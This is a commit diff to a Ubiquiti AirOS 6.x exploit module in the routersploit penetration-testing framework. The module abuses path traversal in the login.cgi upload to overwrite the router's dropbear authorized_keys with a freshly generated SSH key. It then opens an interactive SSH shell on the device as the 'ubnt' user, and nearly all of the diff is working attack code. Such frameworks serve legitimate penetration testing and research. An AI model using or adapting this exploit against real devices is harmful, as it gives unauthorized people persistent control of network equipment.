Added interactive SSH Shell functionality

24cb2588 · root · 0b8359ce · 24cb2588
Commit 24cb2588 authored Apr 27, 2016 by root
Hide whitespace changes
Inline Side-by-side

Showing with 80 additions and 34 deletions

airos_6_x.py routersploit/modules/exploits/ubiquiti/airos_6_x.py +80 -34

No files found.
--- a/routersploit/modules/exploits/ubiquiti/airos_6_x.py
+++ b/routersploit/modules/exploits/ubiquiti/airos_6_x.py
-import string, random, requests, tempfile, os.path
+import requests, tempfile, os.path
+import paramiko, StringIO, termios, tty, sys, select, socket
 from routersploit import (
    exploits,
    print_success,
@@ -36,7 +37,7 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. https://192.168.1.1') #Target address
-    port = exploits.Option(80, 'Target port') #Default port
+    port = exploits.Option(443, 'Target port e.g. 443') #Default port

    #Disable certificate verification warnings
    requests.packages.urllib3.disable_warnings()
@@ -46,37 +47,86 @@ class Exploit(exploits.Exploit):
            print_success('Target is vulnerable')
            print_success('Trying to exploit by uploading SSH public key')

-            if(os.path.isfile(os.path.expanduser('~/.ssh/id_rsa.pub'))):
-                upload_params = {'file': ('../../etc/dropbear/authorized_keys', open(os.path.expanduser('~/.ssh/id_rsa.pub')), {'Expect': ''})}
-                
-                try:
-                    url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
-                    requests.post(url + 'login.cgi', files=upload_params, verify=False)
+            key = paramiko.RSAKey.generate(1024)
+            public_key = key.get_base64()
+            private_key = StringIO.StringIO()
+            key.write_private_key(private_key)

-                except Exception, e:
-                    print e
-                    print_error('Something wrong happened while uploading SSH public key')
+            tmp_file_pubkey = tempfile.TemporaryFile()
+            tmp_file_pubkey.write('ssh-rsa ' + public_key)
+            tmp_file_pubkey.seek(0)

-                else:
-                    print_success('Appareantly the exploit worked fine')
-                    print_success('Try the following command to connect to router')
+            upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})}

-                    ip_target = self.target.replace('https://', '')
-                    ip_target = ip_target.replace('http://', '/')
-                    ip_target = ip_target.replace('/', '')
+            upload_url = sanitize_url('{0}:{1}/login.cgi' .format(self.target, self.port))
+            response = http_request(url=upload_url, method='POST', files=upload_params)

-                    print_info('ssh {0} -l ubnt' .format(ip_target))
+            if(response is None):
+                print_error('Something was wrong while uploading the SSH Public Key')
+                return

-            else:
-                print_error('The SSH public key does not exist. You must to generate it')
+            print_success('Appareantly the exploit worked fine')
+            print_success('Trying to invoke a interactive SSH Shell')
+
+            client = paramiko.SSHClient()
+            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+            pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
+            pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
+            pseudo_privkey_file.close()
+
+            ip_target = self.target.replace('https://', '')
+            ip_target = ip_target.replace('http://', '')
+            ip_target = ip_target.replace('/', '')
+
+            client.connect(ip_target, 22, username='ubnt', pkey=pkey)
+
+            # invoking interactive shell
+            chan = client.invoke_shell()
+            oldtty = termios.tcgetattr(sys.stdin)
+
+            try:
+                tty.setraw(sys.stdin.fileno())
+                tty.setcbreak(sys.stdin.fileno())
+                chan.settimeout(0.0)
+
+                while(True):
+                    r, w, e = select.select([chan, sys.stdin], [], [])
+                    if(chan in r):
+                        try:
+                            x = unicode(chan.recv(1024))
+
+                            if(len(x) == 0):
+                                sys.stdout.write('\r\nExiting...\r\n')
+                                break
+
+                            sys.stdout.write(x)
+                            sys.stdout.flush()
+
+                        except socket.timeout:
+                            pass
+
+                    if(sys.stdin in r):
+                        x = sys.stdin.read(1)
+
+                        if(len(x) == 0):
+                            break
+
+                        chan.send(x)
+
+            finally:
+                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
+                private_key.close()

        else:
            print_error('Target is not vulnerable')

    @mute
    def check(self):
-        url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
-        response = http_request(url=url + 'login.cgi', method='GET')
+        base_url = sanitize_url('{0}:{1}/' .format(self.target, self.port))
+
+        upload_url = base_url + 'login.cgi'
+        response = http_request(url=upload_url, method='GET')

        if(response is None):
            return False #Target not vulnerable
@@ -89,29 +139,25 @@ class Exploit(exploits.Exploit):

        upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}

-        try:
-            requests.post(url + 'login.cgi', files=upload_params, verify=False)
-            tmp_payload.close()
+        response = http_request(url=upload_url, method='POST', files=upload_params)
+        
+        tmp_payload.close()

-        except requests.exceptions.RequestException:
-            tmp_payload.close()
+        if(response is None):
            return False #Target not vulnerable

        #Response to verify if the upload was done correctly
-        verify_upload = http_request(url=url + 'airview.uavr', method='GET')
+        airview_url = base_url + 'airview.uavr'
+        verify_upload = http_request(url=airview_url, method='GET')

        #Upload empty file to "clear" the airview.uavr file
        clean_tmp_file = tempfile.TemporaryFile()
-        clean_tmp_file.write('')
        clean_tmp_file.seek(0)
        
        upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
        
-        try:
-            requests.post(url + 'login.cgi' .format(self.target), files=upload_params, verify=False)
-            clean_tmp_file.close()
-        except requests.exceptions.RequestException:
-            clean_tmp_file.close()
+        http_request(url=upload_url, method='POST', files=upload_params)
+        clean_tmp_file.close()

        if('vulnerable'+rand_str in verify_upload.text):
            return True